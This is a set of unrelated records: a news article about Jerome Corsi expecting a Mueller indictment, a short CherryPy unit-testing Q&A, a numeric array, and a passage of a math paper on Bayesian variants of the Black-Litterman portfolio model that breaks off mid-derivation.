[ "Conservative author Jerome Corsi said Monday that he expects to be indicted by prosecutors working for special counsel Robert S. Mueller III on a charge of lying to investigators probing Russian interference in the 2016 campaign.", "\n\nCorsi, a writer who has promoted political conspiracy theories, provided research during the White House race to longtime Trump adviser Roger Stone, who Mueller has been scrutinizing for possible ties to WikiLeaks.", "\n\nOn Monday, Corsi told listeners of his daily live-stream Web program that he turned over two computers, emails and other communications to Mueller and sat for six interviews totaling more than 40 hours since receiving a subpoena two months ago.", "\n\nBut he said that his cooperation had “exploded” in recent weeks and that Mueller’s team has said he will be criminally charged.", "\n\n“I’m going to be indicted. ", "That’s what we’ve been told. ", "Everyone should know that,” he said.", "\n\nAfter two months of interviews, Corsi, 72, said he felt his brain was “mush.”", "\n\n“I anticipate being indicted on a charge of some form of lying,” he said. “", "Trying to explain yourself to these people is impossible . . . ", "I guess I couldn’t tell the special prosecutor what he wanted to hear.”", "\n\nHe said that Mueller’s questions were expansive, including about a trip he took with his wife to Italy before the 2016 election. ", "Corsi added that he believes Mueller’s team is persecuting him because of his outspoken opposition to the investigation and defense of President Trump.", "\n\n“The Department of Justice is run by criminals,” Corsi said, adding: “I think my crime really was that I supported Donald Trump. ", "Now I guess I’ll go to prison for the rest of my life, because I dared to oppose the ‘deep state.’ ”", "\n\nA spokesman for the special counsel’s office declined to comment.", "\n\nCorsi did not tell his viewers precisely what he had been told by special counsel prosecutors, but made an appeal for donations to his legal defense fund. ", "His attorney, David Gray, declined to comment.", "\n\nJerome Corsi signs copies of his books at the Book Expo America in New York in May. (Charles Sykes/AP)\n\nCorsi is one of at least nine Stone associates who have been interviewed by Mueller’s team, which has been investigating whether anyone in Trump’s orbit coordinated with WikiLeaks in its release of Democratic emails allegedly hacked by Russian operatives.", "\n\nStone made public comments before the 2016 election that suggested he had inside information about material held by WikiLeaks and its founder Julian Assange.", "\n\nSince the election, Stone has said repeatedly that his comments were exaggerations or came from tips from associates, and that he had no advance knowledge of WikiLeaks’s plans.", "\n\nIn a text message to The Washington Post on Monday, Stone said he has not been contacted by Mueller’s team. ", "He said that his attorneys have “fully reviewed” his communications with Corsi.", "\n\n“When those aren’t viewed out of context, they prove everything I have said under oath regarding my interaction with Dr. Corsi is true,” Stone said, adding: “It is possible to take individual communications out of context to create a false impression to a grand jury. ", "Such a case would be weak and would fail.”", "\n\nAppearing on the Infowars website Monday evening, Stone said that “perhaps they have squeezed poor Dr. Corsi to frame me.”", "\n\nStone also seemed to lay the groundwork for an effort to undercut Corsi’s credibility as a witness. “", "He has his own demons,” Stone said of Corsi.", "\n\nPreviously, Stone has said one of his most intriguing pre-election comments was inspired by Corsi.", "\n\nOn August 21, 2016, Stone tweeted that “it will soon the Podesta’s time in the barrel.” ", "Six weeks later, WikiLeaks began to publish online emails hacked from the account of John Podesta, the chairman of Democratic nominee Hillary Clinton’s campaign.", "\n\nStone has said his tweet had nothing to do with WikiLeaks.", "\n\nInstead, he has said he was referring to research material he had discussed with Corsi about links between Russia and John Podesta and his brother, lobbyist Tony Podesta.", "\n\nCorsi has said also said he believes Stone’s tweet was prompted by his research.", "\n\nOn his live-stream program Monday, Corsi said he had never met Assange and had no connection to him. “", "To the best of my recollection,” he added.", "\n\nHe said that to the extent that he had advance knowledge of WikiLeaks’s plans, he had surmised the group’s intentions on his own.", "\n\n“There was no conspiracy,” Corsi said. “", "I found out what I knew largely from open sources. “ ", "He promised to share more details in coming days.", "\n\nStone has previously told The Post that Corsi developed a relationship with Trump over their shared interest in the false theory that President Barack Obama was not born in the United States, the subject of a 2011 Corsi book.", "\n\nCorsi and Trump met during the 2016 campaign, according to Stone.", "\n\nStone recalled that Trump asked him around that time, ‘Who is this guy, Jerome Corsi?’ ” ", "Trump then informed Stone that he had been discussing the subject of Obama’s birth certificate with Corsi." ]
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[ "Q:\n\ncherrypy when to know that the server has started\n\nI am trying to write some unit tests for a small web service written with Cherrypy and I am wondering what's the best way to figure out that the server has started, so i don't get connection refused if I try to connect too early to the service ?", "\n\nA:\n\nI got it figured out:\ncherrypy.engine.start(); cherrypy.server.wait()\nit's the way to go.", "\nOtherwise, I think you can get away with some tricks with\ncherrypy.server.bus.states\n\n" ]
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[ 0, 0.010526315789473684, 0 ]
[ "---\nabstract: 'The Black-Litterman model combines investors’ personal views with historical data and gives optimal portfolio weights. ", "In this paper we will introduce the original Black-Litterman model (section \\[original BL\\]), we will modify the model such that it fits in a Bayesian framework by considering the investors’ personal views to be a direct prior on the means of the returns and by adding a typical Inverse Wishart prior on the covariance matrix of the returns (section \\[inv wishart P inv\\]). ", "Lastly, we will use Leonard and Hsu’s (1992)[@hsu1992] idea of adding a prior on the logarithm of the covariance matrix (section \\[log(sigma) prior\\]). ", "Sensitivity simulations for the level of confidence that the investor has in their own personal views were performed and performance of the models was assessed on a test data set consisting of returns over the month of January $2018$.'\nauthor:\n- 'Mihnea S. Andrei'\n- 'John S.J. Hsu'\ntitle: 'Bayesian Alternatives to the Black-Litterman Model'\n---\n\nThe Original Black-Litterman Model {#original BL}\n==================================\n\nThe Black-Litterman model was developed in the early $1990$’s and has been widely used for asset allocation. ", "This model attempts to combine the market equilibrium [^1] with the investor’s personal views. ", "It can be shown that the optimal portfolio for an investor is the sum of a portfolio proportional to the market equilibrium portfolio and a weighted sum of portfolios reflecting their views. ", "Please see section \\[personal views\\] for an example of how personal views are created and section \\[introduction to model\\] for more details on the model.", "\n\nEstimating the Market Equilibrium {#pi}\n---------------------------------\n\nThe market is in equilibrium when all investors hold the market portfolio, $w_{eq}$. It is when the demand for the assets in this portfolio equals the supply. ", "If we denote by $\\pi$ the market equilibrium returns, then the CAPM equation is $\\pi=\\lambda \\Sigma w_{eq}$. Here, $\\lambda$ is the investor’s risk aversion coefficient and $\\Sigma$ is the covariance matrix of the returns on the assets in the portfolio[@litterman2002].", "\n\nExample of Personal Views {#personal views}\n-------------------------\n\nLet us see how personal views are inputted in the traditional model. ", "For example, let us consider 4 assets: AAPL, AMZN, GOOG and MSFT. ", "Also, let us consider that we believe that AAPL will outperform AMZN by $2\\%$ and we also believe that GOOG will have returns that amount to $5\\%$. The columns in $P$ represent the 4 stocks in the order in which we enumerated them previously. ", "Each row in $P$ and $q$ represents a personal view:\n\n$$P=\n\\begin{bmatrix}\n 1 & -1 & 0 & 0 \\\\\n 0 & 0 & 1 & 0\n\\end{bmatrix},\nq=\n\\begin{bmatrix}\n 0.02 \\\\\n 0.05\n\\end{bmatrix}$$\n\nEach personal view has associated with it an uncertainty that the investor has with respect to the view. ", "The measures of confidence are entered as diagonal entries in a matrix $\\Omega$. As we will see in the next section when we present the assumptions of the model (equations (\\[TraditionalBL\\]), $\\Omega$ is a covariance matrix. ", "Hence, on the main diagonal we will have the variances of the returns for our personal views. ", "Therefore, a small value reflects a high confidence in the view and vice versa (one approach of obtaining $\\Omega$ is by simply manually imputing them and another approach is to estimate it).", "\n\nThe Black-Litterman Approach {#introduction to model}\n----------------------------\n\nNow that we have seen what are the individual pieces of the model, we are ready to present the mathematical formulation. ", "We will consider that the investor is looking at $n$ assets and has $k$ different views on those assets.", "\n\nThe return of the assets is considered to be random, $r \\sim N(\\mu,\\Sigma)$.\n\nWe create a prior on the mean of this return: $\\mu \\sim N(\\pi,\\tau \\Sigma)$. However, the proof would work in the exact same way for any general covariance matrix (please see Appendix \\[proof traditional\\] for the proof). ", "The variable $\\pi$ represents the market equilibrium returns and it is obtained by using an equation equivalent to the CAPM (\\[eq capm\\]): $\\pi=\\lambda\\Sigma w_{eq}$, with $\\lambda$ been the investor’s risk aversion parameter, $w_{eq}$ been the market equilibrium weights and $\\Sigma$ the covariance matrix. ", "Also, here $\\tau$ is considered to be a parameter that reflects the uncertainty in the CAPM prior. ", "Notice that the smaller the $\\tau$, the closer our $\\mu$ will be to the market equilibrium returns $\\pi$.\n\nBesides this prior, we also have the investor’s personal views: $P\\mu \\sim N(q,\\Omega)$, where the same notation as in the previous section \\[personal views\\] is used [@litterman2002].", "\n\nHence, the model is represented by the following $3$ distributions, where the last 2 are priors: $$\\label{TraditionalBL}\n\\begin{aligned} \nr \\sim N(\\mu,\\Sigma) \\\\\n\\mu \\sim N(\\pi,\\tau \\Sigma) \\\\ \nP\\mu \\sim N(q,\\Omega)\n\\end{aligned}$$\n\nBy combining the $2$ priors (the last $2$ distributions from above) and using that as a new prior on the distribution of the return, one can show that the posterior of the return is (please see the appendix \\[proof traditional\\] for the proof): $$\\begin{gathered}\nr\\sim N(\\bar{\\mu},M^{-1}+\\Sigma)\\end{gathered}$$ Where the notation used is, $$\\begin{gathered}\nM^{-1}=\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1} \\\\\n\\bar{\\mu}=\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left( (\\tau\\Sigma)^{-1}\\pi+P^T\\Omega^{-1}q \\right)\\end{gathered}$$ Also, let $\\bar{\\Sigma}=M^{-1}+\\Sigma$\n\nComing back to the example of personal views given in the previous section, if the investor thinks that GOOG will outperform the other 3 companies, it is enough to put a long weight (positive weight) of $1$ on GOOG and short weights (negative weights) for the other $3$. In the Black-Litterman model, the return is considered to be random and we have just seen that the posterior distribution is also normal, but with a mean represented by equation $(3)$. This equation appropriately takes into account market volatility and correlations also. ", "Let us further look at the weights, $w$, that one would obtain when using the posterior of the returns. ", "The typical approach to the problem that an investor with risk aversion parameter $\\lambda$ has when trying to maximize the returns of the portfolio while minimizing the risk is to maximize the function $w^T\\bar{\\mu}-\\frac{\\lambda}{2}w^T\\bar{\\Sigma}w$ with respect to $w$. By taking the derivative with respect to $w$, we obtain for the optimal weights an equation equivalent to CAPM: $$\\begin{gathered}\n \\label{eq capm}\n\\overline{\\mu}=\\lambda \\overline{\\Sigma} w \\Leftrightarrow w=\\frac{1}{\\lambda}\\bar{\\Sigma}^{-1}\\bar{\\mu} \\end{gathered}$$ Using equation $(3)$ and the identity $(\\Sigma+M^{-1})^{-1}=M-M(M+\\Sigma^{-1})^{-1}M$, one can show that: $$\\begin{gathered}\nw^*=\\frac{1}{1+\\tau}(w_{eq}+P^T\\times\\Delta) \\\\\n\\Delta=\\tau\\Omega^{-1}\\frac{q}{\\lambda}-A^{-1}P\\frac{\\Sigma}{1+\\tau}w_{eq}-A^{-1}P\\frac{\\Sigma}{1+\\tau}P^T\\tau\\Omega^{-1}\\frac{q}{\\lambda} \\\\\nA=\\frac{\\Omega}{\\tau}+P\\frac{\\Sigma}{1+\\tau}P^T\\end{gathered}$$\n\nThe first equation from above shows that the Black-Litterman optimal portfolio weights are the equilibrium weights plus a weighted sum of the personal views ($P^T$ has as columns the views). ", "Moreover, the three terms in the second equation have interpretations also:\n\n- The first term shows that the more importance is given to a view either by having a high return $q_k$ (the $k^{th}$ entry of $q$), or by having a smaller uncertainty $\\omega_k$ (this is the $k^{th}$ diagonal entry in $\\Omega$ and hence it will be equal to $\\frac{1}{\\omega_k}$ in $\\Omega^{-1}$), the more weight it will carry into the optimal portfolio\n\n- The second term shows that a weight is penalized if the value of the product between the covariance and the market equilibrium return is high. ", "This would indicate that the view carries less additional information.", "\n\n- The last term shows that an optimized weight is penalized if the covariance between different portfolio views is high. ", "This makes sense since it would mean that different views add little new information.", "\n\nOne can also observe the fact that if an investor has a different risk aversion parameter, $\\hat{\\lambda}$, he can obtain the optimized portfolio weights by using the equation $\\hat{w^*}=\\frac{\\lambda}{\\hat{\\lambda}}w^*$\n\nInverse Wishart prior on $\\Sigma$ {#inv wishart P inv}\n=================================\n\nIntroduction\n------------\n\nFirst of all, we have to observe what we would like to potentially improve on the original approach. ", "But what are the shortcomings of the original approach?", "\n\n- From the proof presented in Appendix \\[proof traditional\\], we notice that it is not a true Bayesian approach since, as mentioned in the previous section, the distributions represented by the last $2$ equations in (\\[TraditionalBL\\]) are combined to find a new prior for $\\mu$. This is used as a prior for the return.", "\n\n- The original approach does not consider any current returns and we would like to model returns over a certain period of time (which will be the investor’s investment horizon). ", "Hence, we would like to have $r_1,r_2,...,r_m \\sim N_n(\\mu, \\Sigma)$\n\n- The covariance matrix $\\Sigma$ is estimated from historical data in the original approach. ", "Hence, we would like to put prior on the distribution of $\\Sigma$ and the most common approach for covariance matrices when the data is from a normal distribution is to use an Inverse Wishart conjugate prior.", "\n\nLet $r_1,r_2,...,r_m \\sim N_n(\\mu,\\Sigma)$ be the observed returns over a period of length $m$ for the $n$ assets that the investor is considering. ", "Also, we would like to consider a prior on the mean of those returns that is projected directly by our personal views $P$. Therefore, we would have, similarly to the traditional model, $P\\mu \\sim N(q,\\Omega)$. The difference is that we would like to add an additional Inverse Wishart prior $\\Sigma \\sim W^{-1}(\\nu,\\Sigma_0)$. Since the returns $r\\in \\mathbb{R}^{n}$, while the prior is on $P\\mu \\in \\mathbb{R}^{k}$ ($k$ is the number of views), the prior is not fully specified, which would suggest the idea that we would need to create an invertible $P$. Also, once we have an invertible $P$, we can follow two approaches:\n\n- Obtain the distribution of $\\mu$, which could be easily done if $P$ is invertible.", "\n\n- From the very beginning transform the returns into the personal view space: $r_i^*=Pr_i$. This procedure will still require $P$ to be invertible since after obtaining the posterior in the transformed space, we have to be able to transform back.", "\n\nHence, either way, we would need to have a matrix $P$ that is invertible and this brings us to the following discussion.", "\n\nCreating an Invertible $P$ {#P inv}\n--------------------------\n\nThe matrix of our personal views is very likely not to be invertible since, as we have seen in Section \\[personal views\\], we can have relative views (the ones for which the rows sum up to $0$) and we can have absolute views (only one $1$ in a row). ", "Moreover, the $k$ views that we will have (the number of rows in $P$) will be smaller than the $n$ assets that we are considering to trade (the number of columns in $P$). ", "In this section, we will present a method in which we can add rows to $P$ such that the resulting square matrix $P^*$ is invertible. ", "The main idea is based on the way in which one would row reduce a matrix to the echelon form.", "\n\nIt is well known that a matrix is invertible iff its row reduced echelon form is the identity matrix. ", "This gives us the idea of taking our matrix $P$ and adding rows to it in order to make it invertible:\n\n- For each column in $P$ that has only $0$’s, we have to create a new row that will have only one $1$ in the respective column and $0$’s in all the others.", "\n\n- If a row has more than $1$ nonzero entry, for each one except the entries in the pivot columns, we have to create a row in which we have a $1$.\n\nFor example, if we consider the matrix $P$ from section \\[personal views\\], the above procedure gives us:\n\n$$P=\n\\begin{bmatrix}\n 1 & -1 & 0 & \\color{red}0 \\\\\n 0 & 0 & 1 & \\color{red}0\n\\end{bmatrix}\\rightarrow\n\\begin{bmatrix}\n 1 & \\color{red}-1 & 0 & 0 \\\\\n 0 & 0 & 1 & 0 \\\\\n 0 & 0 & 0 & 1 \n\\end{bmatrix}\\rightarrow\n\\begin{bmatrix}\n 1 & -1 & 0 & 0 \\\\\n 0 & 0 & 1 & 0 \\\\\n 0 & 0 & 0 & 1 \\\\\n 0 & 1 & 0 & 0 \n\\end{bmatrix}=P^*=\n\\begin{bmatrix}\nP \\\\\nP_2\n\\end{bmatrix}$$\n\nPlease notice that we denoted by $P^*$ the augmented invertible matrix based on $P$, and by $P_2$ the part that was added to $P$.\n\nWe have seen at the beginning of the section that the model equations are: $$\\begin{gathered}\nr_1,r_2,...,r_m|\\mu,\\Sigma \\sim N_n(\\mu,\\Sigma) \\\\\nP\\mu \\sim N_k(q,\\Omega) \\\\\n\\Sigma \\sim W^{-1}(\\nu,\\Sigma_0)\\end{gathered}$$\n\nAs mentioned previously, we have $2$ approaches. ", "We choose to transform the returns using our personal views and, therefore, let $r_i^*=P^*r_i$. Hence, $r_1^*,r_2^*,...,r_m^* \\sim N_n(\\mu^*,\\Sigma^*)$, where $\\mu^*=P^*\\mu$ and $\\Sigma^*=P^*\\Sigma{P^*}^T$. Now, after the transformation onto the space of personal views, the 3 equations become:\n\n$$\\begin{gathered}\nr_1^*,r_2^*,...,r_m^* \\sim N_n(\\mu^*,\\Sigma^*) \\\\\n\\mu^* \\sim N_n(q^*,\\Omega^*) \\\\\n\\Sigma^* \\sim W^{-1}(\\nu,\\Sigma_0)\\end{gathered}$$\n\nHowever, just like $\\mu^*, \\Sigma^*$ were clearly depending on $\\mu, \\Sigma$, we also have that $q^*, \\Omega^*$ depend on the originals $q, \\Omega$:\n\n$$\\begin{gathered}\n \\label{q*}\nq^*=E \\left[\\mu^* \\right]=E\\left[ P^*\\mu \\right]=\nE \\left[\\begin{bmatrix}\nP \\\\\nP_2\n\\end{bmatrix}\\mu\\right]=\n\\begin{bmatrix}\nq \\\\\nq_2\n\\end{bmatrix}\\end{gathered}$$\n\n$$\\begin{gathered}\n \\label{Omega*}\n\\Omega^*=Var \\left( P^*\\mu \\right)=Var \\left( \\begin{bmatrix}\nP \\\\\nP_2\n\\end{bmatrix}\\mu \\right)= \n\\begin{bmatrix}\n\\Omega & P Var(\\mu) P_2^T \\\\\nP_2 Var(\\mu) P^T & P_2 Var(\\mu) P_2^T\n\\end{bmatrix}\\end{gathered}$$\n\nDerivation of Posterior Distributions\n-------------------------------------\n\nNow that we have found a method to augment $P$ to a matrix $P^*$ that is invertible and we also managed to create corresponding $q^*$ and $\\Omega^*$, the problem is posed in a more typical Bayesian framework:\n\n$$\\label{ass1}\n\\begin{aligned}\nr_1^*,r_2^*,...,r_m^* | \\mu^*,\\Sigma^* \\sim N_n(\\mu^*,\\Sigma^*)\n\\end{aligned}$$\n\n$$\\label{ass2}\n\\begin{aligned}\n\\mu^* \\sim N(q^*,\\Omega^*)\n\\end{aligned}$$\n\n$$\\label{ass3}\n\\begin{aligned}\n\\Sigma^* \\sim W^{-1}(\\nu,\\Sigma_0)\n\\end{aligned}$$\n\nFrom (\\[ass1\\]), we obtain that the joint density of our returns is: $$\\begin{aligned}\n f(r_1^*,...,r_m^*|\\mu^*,\\Sigma^*)\\propto det(\\Sigma^*)^{-\\frac{m}{2}}exp\\left \\{ -\\frac{1}{2}\\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)\\right\\}\\end{aligned}$$\n\nFrom (\\[ass2\\]), we obtain that the density for $\\mu^*$ is: $$\\begin{aligned}\n f(\\mu^*) \\propto det(\\Omega^*)^{-\\frac{1}{2}}exp \\left \\{ -\\frac{1}{2} (\\mu^*-q^*)^T{\\Omega^*}^{-1}(\\mu^*-q^*) \\right \\}\\end{aligned}$$\n\nSimilarly, using (\\[ass3\\]), we obtain that the density for $\\Sigma^*$ is: $$\\begin{aligned}\n f(\\Sigma^*) \\propto det(\\Sigma^*)^{-\\frac{\\nu+n+1}{2}}exp\\left \\{ -\\frac{1}{2} Tr\\left(\\Sigma_0{\\Sigma^*}^{-1}\\right)\\right \\}\\end{aligned}$$\n\nHence, by multiplying the above 3 equations, we obtain that the joint density for all of them is: $$\\label{joint dist}\n\\begin{aligned}\n f(r_1^*,...,r_m^*,\\mu^*,\\Sigma^*)\\propto det(\\Sigma^*)^{-\\frac{\\nu+m+n+1}{2}}exp \\left \\{ -\\frac{1}{2} Tr\\left(\\Sigma_0{\\Sigma^*}^{-1}\\right)\\right \\} det(\\Omega^*)^{-\\frac{1}{2}}\\cdot \\\\\nexp\\left \\{-\\frac{1}{2}\\left((\\mu^*-q^*)^T{\\Omega^*}^{-1}(\\mu^*-q^*)+ \\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*) \\right ) \\right \\}\n\\end{aligned}$$\n\nLet us focus on the parenthesis in the second exponential and let us prove the following result.", "\n\n\\[r-mu identity\\] The following equality holds, where $\\bar r^*=\\frac{\\sum_{i=1}^m r_i^*}{m}$: $$\\begin{aligned}\n \\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)=&\\sum_{i=1}^m (r_i^*-\\bar r^*)^T{\\Sigma^*}^{-1}(r_i^*-\\bar r^*)+ \\\\\n &+m(\\bar r^*-\\mu^*)^T{\\Sigma^*}^{-1}(\\bar r^*-\\mu^*)\\end{aligned}$$\n\nWe will start by manipulating the right hand side: $$\\begin{aligned}\n RHS&=\\sum_{i=1}^m({r_i^*}^T{\\Sigma^*}^{-1}r_i^*-{r_i^*}^T{\\Sigma^*}^{-1}\\bar r^*-{\\overline{r}^{*}}^{T}{\\Sigma^*}^{-1}{r_i^*}+{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\overline{r}^*)+\\\\\n &m{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\bar r^*\n -m{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\mu^*-m{\\mu^*}^T{\\Sigma^*}^{-1}\\bar r^*+m{\\mu^*}^T{\\Sigma^*}^{-1}\\mu^*\n \\end{aligned}$$\n\nBut since $m\\bar r^*=\\sum_{i=1}^m r_i^* \\Rightarrow m{\\overline{r} ^*}^T=\\sum_{i=1}^m {r_i^*}^T$, we obtain that:\n\n$$\\begin{aligned}\n RHS&=\\sum_{i=1}^m({r_i^*}^T{\\Sigma^*}^{-1}r_i^*-{r_i^*}^T{\\Sigma^*}^{-1}\\bar r^*-{\\overline{r}^*}^T{\\Sigma^*}^{-1}r_i^*)+2m{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\bar r^*-\\\\\n &-\\left (\\sum_{i=1}^m {r_i^*}^T\\right){\\Sigma^*}^{-1}\\mu^*-{\\mu^*}^T{\\Sigma^*}^{-1}\\left(\\sum_{i=1}^m r_i^* \\right)+\\sum_{i=1}^m{\\mu^*}^T{\\Sigma^*}^{-1}\\mu^*=\\\\\n &=\\sum_{i=1}^m({r_i^*}^T{\\Sigma^*}^{-1}r_i^*-{r_i^*}^T{\\Sigma^*}^{-1}\\bar r^*-{\\overline{r}^*}^T{\\Sigma^*}^{-1}r_i^*)+2m{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\bar r^*-\\\\\n &-\\sum_{i=1}^m {r_i^*}^T{\\Sigma^*}^{-1}\\mu^*-\\sum_{i=1}^m{\\mu^*}^T{\\Sigma^*}^{-1} r_i^* +\\sum_{i=1}^m{\\mu^*}^T{\\Sigma^*}^{-1}\\mu^*\n \\end{aligned}$$\n\nWe observe that ${\\Sigma^*}^{-1}$ and $\\bar r^*$ do not depend on the sum. ", "Hence, we can factor them out:\n\n$$\\begin{aligned}\n RHS&=\\sum_{i=1}^m({r_i^*}^T{\\Sigma^*}^{-1}r_i^*-{r_i^*}^T{\\Sigma^*}^{-1}\\mu^*-{\\mu^*}^T{\\Sigma^*}^{-1}r_i^*+ {\\mu^*}^T{\\Sigma^*}^{-1}\\mu^*)+\\\\\n &+2m{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\bar r^*-\\left( \\sum_{i=1}^m {r_i^*}^T\\right){\\Sigma^*}^{-1}\\bar r^*- \\bar r^*{\\Sigma^*}^{-1}\\left(\\sum_{i=1}^m r_i^* \\right)=\\\\\n &=\\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)+2m{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\bar r^*- m{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\bar r^*- \\\\\n &-m{\\overline{r}^*}^T{\\Sigma^*}^{-1}\\bar r^*=\\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)\n \\end{aligned}$$\n\nLet us make a notation before we proceed: $s^2=\\frac{\\sum_{i=1}^m (r_i^*-\\bar r^*)^T{\\Sigma^*}^{-1}(r_i^*-\\bar r^*)}{m-1}$\n\nNow, by using **Lemma 1**, we are ready to come back to the paranthesis in the second exponential from the joint density of $(r_1^*,...,r_m^*,\\mu^*,\\Sigma^*)$ (equation (\\[joint dist\\])): $$\\begin{gathered}\n (\\mu^*-q^*)^T{\\Omega^*}^{-1}(\\mu^*-q^*)+ \\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)=\\\\\n =(m-1)s^2+ m(\\bar r^*-\\mu^*)^T{\\Sigma^*}^{-1}(\\bar r^*-\\mu^*)+(\\mu^*-q^*)^T{\\Omega^*}^{-1}(\\mu^*-q^*)=\\\\\n =(m-1)s^2+(\\bar r^*-\\mu^*)^T(m{\\Sigma^*}^{-1})(\\bar r^*-\\mu^*)+ (\\mu^*-q^*)^T{\\Omega^*}^{-1}(\\mu^*-q^*) {\\addtocounter{equation}{1}\\tag{\\theequation}}\\label{eq lemma 1}\\end{gathered}$$\n\n**(Completing the square)** \\[lemma2\\] For any $A \\in {\\mathbb{R}}^{p\\times p}$ positive definite, $B \\in {\\mathbb{R}}^{p\\times p}$ positive semi-definite and $a,b\\in \\mathbb{R}^{p}$ the following identity holds: $$\\begin{gathered}\n (y-a)^TA(y-a)+(y-b)^TB(y-b)=(y-y^*)^T(A+B)(y-y^*)+\\\\\n +(a-b)^TH(a-b),\\end{gathered}$$ where $y^*=(A+B)^{-1}(Aa+Bb)$ and $H=A(A+B)^{-1}B$. If, furthermore, $B$ is positive definite, then $H=(A^{-1}+B^{-1})^{-1}$. [@hsu1999]\n\nSince both of our normal distributions are not degenerated because we can have inverses for both $\\Sigma^*$ and $\\Omega^*$, we conclude that they do not have any eigenvalues equal to $0$. Moreover, since they are covariance matrices, we know that they are positive semi-definite. ", "Therefore their eigenvalues are greater than or equal to $0$. But since they can’t be $0$, we observe that they have to be strictly greater than $0$. This implies that both matrices are positive definite and therefore we can use the second formula for $H$ in **Lemma 2**.", "\n\nNow we are ready to apply this result to equation (\\[eq lemma 1\\]) for $y=\\mu^*$, $a=\\bar r^*$, $b=q^*$, $A=m{\\Sigma^*}^{-1}$ and $B={\\Omega^*}^{-1}$: $$\\begin{gathered}\n (\\ref{joint dist})\\Leftrightarrow (\\ref{eq lemma 1}) \\Leftrightarrow (m-1)s^2+(\\mu^*-\\overline{\\mu^*})^T(m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1})(\\mu^*-\\overline{\\mu^*})+ \\\\\n +(\\bar r^*-q^*)^TH(\\bar r^*-q^*),\\end{gathered}$$ where $\\overline{\\mu^*}=(m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1})^{-1}(m{\\Sigma^*}^{-1}\\bar r^*+{\\Omega^*}^{-1} q^*)$ and $H=\\left(\\frac{1}{m}\\Sigma^*+\\Omega^*\\right)^{-1}$.\n\nIf we go back with this result in the joint density represented by equation (\\[joint dist\\]), we obtain that: $$\\begin{gathered}\n f(r_1^*,...,r_m^*,\\mu^*,\\Sigma^*)\\propto \\\\ \n \\propto det(\\Sigma^*)^{-\\frac{m}{2}}exp\\left \\{ -\\frac{1}{2}(\\mu^*-\\overline{\\mu^*})^T(m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1})(\\mu^*-\\overline{\\mu^*})\\right \\}\\cdot \\\\ \n \\cdot exp\\left \\{-\\frac{1}{2}(\\bar r^*-q^*)^TH(\\bar r^*-q^*)+(m-1)s^2 \\right \\} \\cdot\\\\ \n \\cdot det(\\Omega^*)^{-\\frac{1}{2}}det(\\Sigma^*)^{\\frac{\\nu+n+1}{2}}exp\\left \\{-\\frac{1}{2}Tr\\left(\\Sigma_0{\\Sigma^*}^{-1}\\right) \\right \\}\\end{gathered}$$\n\nSince the only part that depends on $\\mu^*$ is the first line of the above equation, we conclude that:\n\n$$\\begin{gathered}\n f(\\mu^*|r_1^*,...,r_m^*,\\Sigma^*)\\propto exp\\left \\{ -\\frac{1}{2}(\\mu^*-\\overline{\\mu^*})^T (m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1})(\\mu^*-\\overline{\\mu^*})\\right \\}\\Rightarrow \\\\\n \\mu^*|r_1^*,...,r_m^*,\\Sigma^* \\sim N_n \\left(\\overline{\\mu^*},\\overline{\\Sigma^*}\\right), \\text{ where } \\\\\n \\overline{{\\mu^*}}=\\left(m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1}\\right)^{-1}\\left(m{\\Sigma^*}^{-1}\\bar r^*+{\\Omega^*}^{-1} q^*\\right)\\\\\n \\overline{\\Sigma^*}=\\left(m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1}\\right)^{-1} {\\addtocounter{equation}{1}\\tag{\\theequation}}\\label{posterior mu}\\end{gathered}$$\n\nIn order to find the posterior of $\\Sigma^*$, it is easier to start from the original joint density represented by equation (\\[joint dist\\]). ", "By collecting the terms that depend on $\\Sigma^*$ we obtain: $$\\begin{gathered}\n f(\\Sigma^*|r_1^*,...,r_m^*,\\mu^*)\\propto det(\\Sigma^*)^{-\\frac{\\nu+m+n+1}{2}}\\\\ \n exp \\left \\{ -\\frac{1}{2} \\left ( \\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)+ Tr\\left(\\Sigma_0{\\Sigma^*}^{-1}\\right) \\right) \\right \\} {\\addtocounter{equation}{1}\\tag{\\theequation}}\\label{eq8}\\end{gathered}$$ We notice that this is quite close to another Inverse Wishart distribution, the only step left that we have to make is to manipulate the exponential. ", "Let us notice that $$\\begin{gathered}\n \\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)\\in \\mathbb{R} \\Rightarrow \\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)= \\\\ \n =Tr\\left (\\sum_{i=1}^m (r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*) \\right)\n =\\sum_{i=1}^m Tr \\left((r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)\\right)\\end{gathered}$$ But inside the $Trace$ matrices are cyclically commutative as long as the dimensions agree: $$\\begin{gathered}\n \\sum_{i=1}^m Tr \\left((r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}(r_i^*-\\mu^*)\\right)\n 